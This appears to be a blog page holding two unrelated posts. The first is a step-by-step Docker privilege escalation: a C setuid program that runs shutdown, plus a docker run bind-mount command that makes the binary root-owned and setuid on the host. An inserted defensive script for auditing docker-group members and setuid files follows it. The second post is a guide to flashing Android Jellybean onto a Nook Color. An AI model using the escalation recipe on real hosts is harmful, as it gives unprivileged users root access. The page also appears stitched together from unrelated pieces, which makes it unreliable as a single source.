Serious docker root exploit

I was amazed at how easy this was.  I found a couple of different websites that led me to this; giving credit where credit is due:

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So, putting 1 and 2 together: I have my docker install running as the “docker” user, so no “sudo” is required.  All I did (as docker) is:

1. Create the following snippet of C code, shutdown_setuid.c :
docker $> vi shutdown_setuid.c
#include <stdlib.h>
#include <unistd.h>

int main() {
    /* the file is setuid root after step 3, so this makes the real UID 0 too */
    setuid(0);
    system("/sbin/shutdown -h now"); /* change this to the actual location of shutdown */
    return 0;
}

2. Compile it :
docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory, set shutdown_setuid to be owned by root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c 'chown root.root /stuff/shutdown_setuid && chmod a+s /stuff/shutdown_setuid'

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid
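
The steps above work because an account that can reach the Docker daemon without sudo can write root-owned setuid files onto the host through a bind mount. As an added example (not code from the original post), this audit script lists which accounts have that access and finds the setuid/setgid files such a run leaves behind; the function names docker_capable_users and find_setid_files are hypothetical, and the group name "docker" is taken from the setup described in the post.

```shell
#!/bin/sh
# Added defensive example; not part of the original post.

# docker_capable_users [GROUP] [GROUP_FILE] [PASSWD_FILE]
# Prints every account that is in GROUP, one per line, sorted:
#   - supplementary members (field 4 of the group file), and
#   - accounts whose primary GID is GROUP's GID (these are NOT listed in
#     field 4, so checking the group file alone misses them).
docker_capable_users() {
    grp=${1:-docker}
    group_file=${2:-/etc/group}
    passwd_file=${3:-/etc/passwd}
    gid=$(awk -F: -v g="$grp" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0        # group does not exist: nothing to report
    {
        awk -F: -v g="$grp" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        awk -F: -v id="$gid" '$4 == id { print $1 }' "$passwd_file"
    } | sort -u
}

# find_setid_files DIR [OWNER]
# Prints regular files under DIR that are owned by OWNER (name or numeric
# UID, default root) and carry the setuid or setgid bit, like the
# -rwsrwsr-x file in step 4. -xdev keeps the scan on one filesystem.
find_setid_files() {
    find "$1" -xdev -type f -user "${2:-root}" \
        \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Typical use on a host (run as root so every directory is readable):
#   docker_capable_users
#   find_setid_files /home
```

A root-owned setuid file inside a directory that only an unprivileged account writes to is the artifact of step 3; mounting such directories with the nosuid option stops the bit from being honored.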

Turning your Nook Color into an Android 4.1 Jellybean tablet

Converting a nook color into a Jellybean 4.1 tablet.  I think it took me longer to write this up than to actually do it 🙂

Done on Linux Mint – bash commands are showing in bold italics

  1. grab a microsd card – they say that Sandisk brand, at least Class 4 works best.
    I have done this with both a 4GB and 8GB card, both worked, you can go larger – I am not sure if there is a max capacity supported by Android or the nook
  2. Download the boot image – http://forum.xda-developers.com/showthread.php?p=32921666#post32921666
    Look for the attachment to the main article – generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    I get a md5sum of : a2f15e48a5bb858db8ec02ccedbcb5b7
  3. glaw@mint:~$ mkdir nook
  4. glaw@mint:~/nook$ wget http://download.cyanogenmod.com/get/jenkins/17892/cm-10-20130114-NIGHTLY-encore.zip  
  5. glaw@mint:~/nook$ wget http://goo.im/gapps/gapps-jb-20121011-signed.zip
  6. glaw@mint:~/nook$ md5sum cm*.zip gapp*.zip
    3cc2124c8f91e133ec28d438ccd5204f  cm-10-20130114-NIGHTLY-encore.zip
    4e9e7ec3c22b0b3471bd05d62b8a659d  gapps-jb-20121011-signed.zip
  7. glaw@mint:~/nook$ unzip generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    Archive:  generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
      inflating: generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img
  8. glaw@mint:~/nook$ sudo dd if=generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img of=/dev/sde bs=1M
    [sudo] password for glaw: 
    298+1 records in
    298+1 records out
    312560640 bytes (313 MB) copied, 69.6386 s, 4.5 MB/s
  9. eject the card and reinsert – I just disconnected my card reader and reconnected
  10. Mount the SD card – this is a 300 MB vfat partition

    glaw@mint:~/nook$ sudo mount /dev/sde1 /mnt
    glaw@mint:~/nook$ ls -la /mnt

    total 8112
    drwxr-xr-x  2 root root    4096 Dec 31  1969 .
    drwxr-xr-x 27 root root    4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root   14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root  289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root 2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root 5234466 Oct 17 19:41 uRamdisk
  11. glaw@mint:~/nook$ sudo cp cm*.zip gapp*.zip /mnt
    glaw@mint:~/nook$ ls -la /mnt

    total 253116
    drwxr-xr-x  2 root root      4096 Dec 31  1969 .
    drwxr-xr-x 27 root root      4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root 158172246 Jan 19 10:14 cm-10-20130114-NIGHTLY-encore.zip
    -rwxr-xr-x  1 root root  92706064 Jan 19 10:15 gapps-jb-20121011-signed.zip
    -rwxr-xr-x  1 root root     14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root    289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root   2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root   5234466 Oct 17 19:41 uRamdisk
  12. glaw@mint:~/nook$ sudo umount /mnt
  13. eject the card
  14. With the nook powered off, insert into the nook’s microsd slot and then power on.  Sit back and relax for 4 and a half minutes :
    http://www.youtube.com/watch?v=Bsipwz3pk3I
  15. repower on the nook and welcome to Android Jellybean.
    http://www.youtube.com/watch?v=3vaO3W6HJU4